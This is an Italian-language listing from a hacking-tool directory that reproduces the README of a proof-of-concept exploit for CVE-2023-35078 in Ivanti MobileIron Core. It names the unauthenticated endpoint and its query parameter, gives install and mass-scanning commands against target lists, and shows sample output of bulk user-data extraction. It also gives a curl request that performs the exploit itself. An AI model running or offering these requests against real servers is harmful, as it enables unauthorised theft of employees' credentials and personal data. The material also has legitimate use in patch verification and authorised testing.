Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-35078 — CVE-2023-35078 - Strumento di exploit per accesso API remoto non autenticato a Ivanti MobileIron Core | Kitploit
Strumenti/GitHubGitHub/0nsec/cve-2023-35078
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Strumento di exploit per accesso API remoto non autenticato a Ivanti MobileIron Core

Vedi Repository
1501 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-35078 Strumento di Exploit

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core Accesso API Remoto Non Autenticato

Versione Python Licenza CVSS Ultimo aggiornamento

Un exploit proof-of-concept basato su Python per CVE-2023-35078, che mira alla vulnerabilità di Accesso API Remoto Non Autenticato nei sistemi Ivanti MobileIron Core.

Panoramica della Vulnerabilità

CVE-2023-35078 è una vulnerabilità critica che interessa Ivanti MobileIron Core e consente a un utente malintenzionato remoto non autenticato di accedere a endpoint API sensibili ed estrarre dati utente senza alcuna autenticazione.

  • Punteggio CVSS: 9.8 (Critico)
  • CWE: CWE-306 (Mancata autenticazione per funzioni critiche)
  • Prodotti interessati: Ivanti MobileIron Core
  • Versioni vulnerabili:
    • 11.2 (precedenti a 11.2 CU21)
    • 11.3 (precedenti a 11.3 CU18)
    • 11.4 (precedenti a 11.4 CU8)
  • Vettore di attacco: Rete
  • Autenticazione: Nessuna richiesta
  • Interazione utente: Nessuna richiesta
  • Impatto: Esposizione completa dei dati utente

Dettagli Tecnici

La vulnerabilità risiede nel meccanismo di autenticazione API di MobileIron Core, in particolare nell'endpoint /mifs/aad/api/v2/authorized/users. L'endpoint non convalida correttamente i token di autenticazione, consentendo l'accesso non autorizzato a informazioni sensibili degli utenti, tra cui:

  • Credenziali utente: Nomi utente, hash delle password
  • Dati personali: Nomi completi, indirizzi email, numeri di telefono
  • Dati aziendali: ID dipendenti, informazioni sul reparto
  • Informazioni sui dispositivi: Dispositivi registrati, configurazioni dei dispositivi
  • Dati amministrativi: Ruoli utente, permessi, appartenenze a gruppi

Installazione

Prerequisiti

  • Python: 3.6 o superiore
  • Sistema operativo: Linux, macOS, Windows
  • Accesso alla rete: Necessario per il test del target
  • Permessi: Autorizzazione dei proprietari del sistema

Installazione Rapida

root@kitploit:~
# Clone the repository
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Install dependencies
pip3 install -r requirements.txt

# Make executable (Linux/macOS)
chmod +x cve_2023_35078.py

Installazione Manuale

root@kitploit:~
# Create project directory
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Download the script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Install required packages
pip3 install requests urllib3 termcolor argparse

Installazione Docker (Opzionale)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Build and run with Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

Utilizzo

Utilizzo Base

root@kitploit:~
# Test single target
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Test multiple targets from file
python3 cve_2023_35078.py -f targets.txt

# Verbose mode with custom output directory
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Custom timeout and output settings
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

Esempi di Utilizzo Avanzato

root@kitploit:~
# Comprehensive corporate assessment
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Single target with detailed logging
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Batch scanning with custom timeout
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Quick vulnerability check (no verbose output)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

Output

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Target: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Checking version for: https://vulnerable.mobileiron.com
[*] Detected version: 11.3
[+] Target appears VULNERABLE!
[*] Attempting to exploit: https://vulnerable.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] SUCCESS! Found 1,247 users
[+] Results saved to: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Extracted 1247 user records
[*] Sample fields: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] Scan completed!
[*] Targets processed: 1
[*] Successful exploits: 1
[!] WARNING: 1 vulnerable system(s) found!
[!] Ensure proper authorization before testing!

Output Dettagliato

root@kitploit:~
[*] Checking version for: https://test.mobileiron.com
[*] Trying endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Response length: 45,123 bytes
[*] JSON parsing successful
[*] Found user data structure with 234 records
[+] SUCCESS! Found 234 users
[*] Sample user data: {'id': '12345', 'username': '[email protected]'}
[+] Results saved to: ./results/test_mobileiron_com_20250821_055013.json

Ottimizzazioni Prestazionali

  • Connection Pooling: Riutilizza le connessioni HTTP
  • Richieste Concurrenti: Elaborazione parallela per più target
  • Timeout Intelligenti: Timeout adattivo basato sui tempi di risposta
  • Gestione della Memoria: Gestione efficiente di grandi set di dati
  • Limitazione della Frequenza: Ritardi integrati per evitare di sovraccaricare i target

Informazioni sulla Patch del Fornitore

Verifica della Patch

root@kitploit:~
# Check current version
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verify patched endpoints return 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

Riferimenti e Risorse

Advisory di Sicurezza Ufficiali

  • NVD - CVE-2023-35078
  • Advisory di Sicurezza Ivanti
  • Vulnerabilità Conosciute Sfruttate da CISA

Documentazione Tecnica

  • Guida Amministratore Ivanti MobileIron Core
  • Documentazione API
  • Guida all'Indurimento della Sicurezza

Articoli di Ricerca e Analisi

  • Analisi Tecnica Dettagliata
  • Tecniche di Sfruttamento
  • Report di Threat Intelligence
Scarica lo strumento
VersioneVulnerabilePatch DisponibileLivello PatchData di Rilascio
11.2.xSìDisponibileCU21+2023-07-25
11.3.xSìDisponibileCU18+2023-07-25
11.4.xSìDisponibileCU8+2023-07-25
11.5.x+NoN/AN/AN/A